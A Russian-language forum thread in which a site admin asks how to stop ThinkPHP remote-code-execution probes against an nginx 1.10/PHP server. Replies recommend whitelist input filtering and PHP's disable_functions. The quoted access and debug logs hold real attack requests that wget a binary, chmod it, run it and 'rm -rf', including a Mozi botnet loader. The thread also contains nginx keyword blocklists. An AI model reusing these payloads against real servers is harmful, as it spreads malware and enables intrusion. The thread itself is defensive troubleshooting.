Nginx 1.10 эксплойт php через аргументы GET, как пофиксить?

Question

[fastboot]

Пример:

{"status": "400","ip": "87.117.152.116","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "puzzles/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T06:14:30+02:00"}

Вот сам запрос:

/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'

Linux:

4.14.111 #1 SMP The Dec 19 15:23:22 CST 2019 armv7l armv7l armv7l  GNU/Linux

Обновлений для nginx нету, доступная версия 1.10.

Файл /etc/nginx/sites-enabled/default

if ($request_uri ~* "call_user_array|shell_exec|wget") {
return 444;
}

когда я в локалке через curl запрос, то правило работает - но не работает запрос из вне?

curl -I --user-agent "Test" "http://192.168.255.249/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"

но если смотреть на этот лог:

{"status": "444","ip": "112.163.119.159","host": "95.153.111.12","path": "/shell?cd+/tmp;rm+-rf+*;wget+http://112.163.119.159:33790/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws","referrer": "-","user_agent": "Hello, world","length": 0,"generation_time_milli": 0.000,"date": "2021-01-12T08:10:10+02:00"}

тут уже работает правило код 444, но если смотреть след. лог:

{"status": "400","ip": "170.246.86.201","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.239.242.76/bns/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "puzzles/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T08:24:18+02:00"}

то тут код 400.
Как пофиксить?

Comments

[Lynn «Кофеман»]

Конфиг nginx покажите.

Хотя подозреваю, что чинить надо не его, а PHP скрипт(ы)

[fastboot]

Lynn «Кофеман»,

[FanatPHP]

Как тут уже сказали, надо девочек менять, а не кровати переставлять

[FanatPHP]

Боже мой, какой прекрасный конфиг! Его надо отлить в граните и поместить в палату мер и весов.

Как иллюстрацию принципа "черные списки не обеспечивают никакой защиты"

[Alexey Dmitriev]

Я бы хотел уточнить - что значит нет обновлений для nginx 1.10?
Вот же они на официальном сайте https://nginx.org/ru/linux_packages.html

[Lynn «Кофеман»]

Если snippets/fastcgi-php.conf стандартный, то в конфиге nginx проблем нет.
Смотрите как у вас в скриптах обрабатываются GET-параметры и чините.

Ну и вообще, первый ответ в гугле https://securitynews.sonicwall.com/xmlpost/thinkph...

Answer 1

[xmoonlight]

Regex-фильтр всех входных пользовательских данных по "белому" списку решает все вопросы раз и навсегда.
Правьте php-скрипт-обработчик роутинга всех входящих запросов и добавляйте туда фильтрацию.

Comments

[fastboot]

Regex-фильтр всех входных пользовательских данных

в каком режиме это? на стороне nginx? если можно ткните куда смотреть :)

[xmoonlight]

fastboot, в php, preg_match()

[fastboot]

xmoonlight, типо в index.php сделать проверку? кажись понял идею

[xmoonlight]

fastboot, да, именно... он же за роутинг отвечает.

[fastboot]

xmoonlight, извини, я чайник)) умные слова я не сразу понимаю

[xmoonlight]

fastboot, поиск в гугле (мой блог): Веб-сайт: базис, архитектура, создание

[fastboot]

xmoonlight,

root@ZeroPi-WWW:/tmp# cat /etc/nginx/sites-enabled/vitko-core.ru
# http://vitko-core.ru

server {
    listen 80 default_server;

    root /var/www/vitko-core.ru;

    index index.php index.html index.htm;

    server_name vitko-core.ru www.vitko-core.ru;

    #if ($request_uri ~* "call_user_func_array|shell_exec|wget") { return 444;break;}

        location / {
                if ($query_string ~ "call_user_func_array" ) {
                        return 403;
                }

                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                if ( $args ~* "call_user_func_array|shell_exec|wget" ) {
                        return 444;
                }
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.0-fpm.sock;
        }
}

смотрю лог:

{"status": "400","ip": "189.111.65.123","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://88.218.16.198/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "Uirusu/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T23:08:40+02:00"}

[xmoonlight]

fastboot, лог чего? где тут php?

[fastboot]

xmoonlight, в index.php подключаю этот файл

[fastboot]

xmoonlight, он один раз сработал http://vitko-core.ru/dev/log/. Вчера проверял через curl вроде всё работало, очистил лог - смотрю уже сейчас уже нет

[fastboot]

xmoonlight, ошибка 400 - пытался на уровне nginx фильтровать, работает только если я делаю запрос из своего железа

[xmoonlight]

fastboot, фильтровать нужно контент в php (index.php в твоём случае). А роутпоинт - настроить один раз в конфиге nginx.

[xmoonlight]

fastboot, какой strpos?!!!!!
Говорю же: preg_match() юзай!

[fastboot]

xmoonlight,

2021/01/13 11:44:27 [debug] 589#589: accept on 0.0.0.0:80, ready: 0
2021/01/13 11:44:27 [debug] 589#589: posix_memalign: 00584A50:256 @16
2021/01/13 11:44:27 [debug] 589#589: *13 accept: 5.89.124.222:48290 fd:9
2021/01/13 11:44:27 [debug] 589#589: *13 event timer add: 9: 60000:4213358598
2021/01/13 11:44:27 [debug] 589#589: *13 reusable connection: 1
2021/01/13 11:44:27 [debug] 589#589: *13 epoll add event: fd:9 op:1 ev:80002001
2021/01/13 11:44:27 [debug] 589#589: *13 post event 005BF8C0
2021/01/13 11:44:27 [debug] 589#589: *13 delete posted event 005BF8C0
2021/01/13 11:44:27 [debug] 589#589: *13 http wait request handler
2021/01/13 11:44:27 [debug] 589#589: *13 malloc: 0059A928:1024
2021/01/13 11:44:27 [debug] 589#589: *13 posix_memalign: 0059AD30:256 @16
2021/01/13 11:44:27 [debug] 589#589: *13 recv: fd:9 0 of 1024
2021/01/13 11:44:27 [info] 589#589: *13 client closed connection while waiting for request, client: 5.89.124.222, server: 0.0.0.0:80
2021/01/13 11:44:27 [debug] 589#589: *13 close http connection: 9
2021/01/13 11:44:27 [debug] 589#589: *13 event timer del: 9: 4213358598
2021/01/13 11:44:27 [debug] 589#589: *13 reusable connection: 0
2021/01/13 11:44:27 [debug] 589#589: *13 free: 0059A928
2021/01/13 11:44:27 [debug] 589#589: *13 free: 00584A50, unused: 8
2021/01/13 11:44:27 [debug] 589#589: *13 free: 0059AD30, unused: 232
2021/01/13 11:56:00 [debug] 589#589: post event 005BF860
2021/01/13 11:56:00 [debug] 589#589: delete posted event 005BF860
2021/01/13 11:56:00 [debug] 589#589: accept on 0.0.0.0:80, ready: 0
2021/01/13 11:56:00 [debug] 589#589: posix_memalign: 00584A50:256 @16
2021/01/13 11:56:00 [debug] 589#589: *14 accept: 86.34.111.230:33013 fd:9
2021/01/13 11:56:00 [debug] 589#589: *14 event timer add: 9: 60000:4214051446
2021/01/13 11:56:00 [debug] 589#589: *14 reusable connection: 1
2021/01/13 11:56:00 [debug] 589#589: *14 epoll add event: fd:9 op:1 ev:80002001
2021/01/13 11:56:00 [debug] 589#589: *14 post event 005BF8C0
2021/01/13 11:56:00 [debug] 589#589: *14 delete posted event 005BF8C0
2021/01/13 11:56:00 [debug] 589#589: *14 http wait request handler
2021/01/13 11:56:00 [debug] 589#589: *14 malloc: 0059A928:1024
2021/01/13 11:56:00 [debug] 589#589: *14 posix_memalign: 0059AD30:256 @16
2021/01/13 11:56:00 [debug] 589#589: *14 recv: fd:9 320 of 1024
2021/01/13 11:56:00 [debug] 589#589: *14 reusable connection: 0
2021/01/13 11:56:00 [debug] 589#589: *14 posix_memalign: 0058AD60:4096 @16
2021/01/13 11:56:00 [debug] 589#589: *14 http process request line
2021/01/13 11:56:00 [debug] 589#589: *14 http request line: "GET /index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"
2021/01/13 11:56:00 [debug] 589#589: *14 http uri: "/index.php"
2021/01/13 11:56:00 [debug] 589#589: *14 http args: "s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"
2021/01/13 11:56:00 [debug] 589#589: *14 http exten: "php"
2021/01/13 11:56:00 [debug] 589#589: *14 http process request header line
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Connection: keep-alive"
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Accept-Encoding: gzip, deflate"
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Accept: /"
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "User-Agent: Uirusu/2.0"
2021/01/13 11:56:00 [debug] 589#589: *14 http header done
2021/01/13 11:56:00 [info] 589#589: *14 client sent HTTP/1.1 request without "Host" header while reading client request headers, client: 86.34.111.230, server: vitko-core.ru, request: "GET /index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"
2021/01/13 11:56:00 [debug] 589#589: *14 http finalize request: 400, "/index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'" a:1, c:1
2021/01/13 11:56:00 [debug] 589#589: *14 event timer del: 9: 4214051446
2021/01/13 11:56:00 [debug] 589#589: *14 http special response: 400, "/index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"
2021/01/13 11:56:00 [debug] 589#589: *14 http set discard body
2021/01/13 11:56:00 [debug] 589#589: *14 xslt filter header
2021/01/13 11:56:00 [debug] 589#589: *14 HTTP/1.1 400 Bad Request
Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 13 Jan 2021 09:56:00 GMT
Content-Type: text/html
Content-Length: 182
Connection: close

Что тут не так? просто смотрю этот лог и пытаюсь понять как это всё работает. Ошибка 400 от nginx это хорошо для него или нет?

Answer 2

[Slava Rozhnev]

Можно запретить исполнение "опсных фенкций в PHP". Добавить следующую строку в php.ini:

# disable functions 
disable_functions=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

Comments

[xmoonlight]

Функций - гораааздо больше.
Но запретить всё - тоже не особо поможет. Права и "песочницы" для ограничения среды исполнения - куда лучше будет использовать...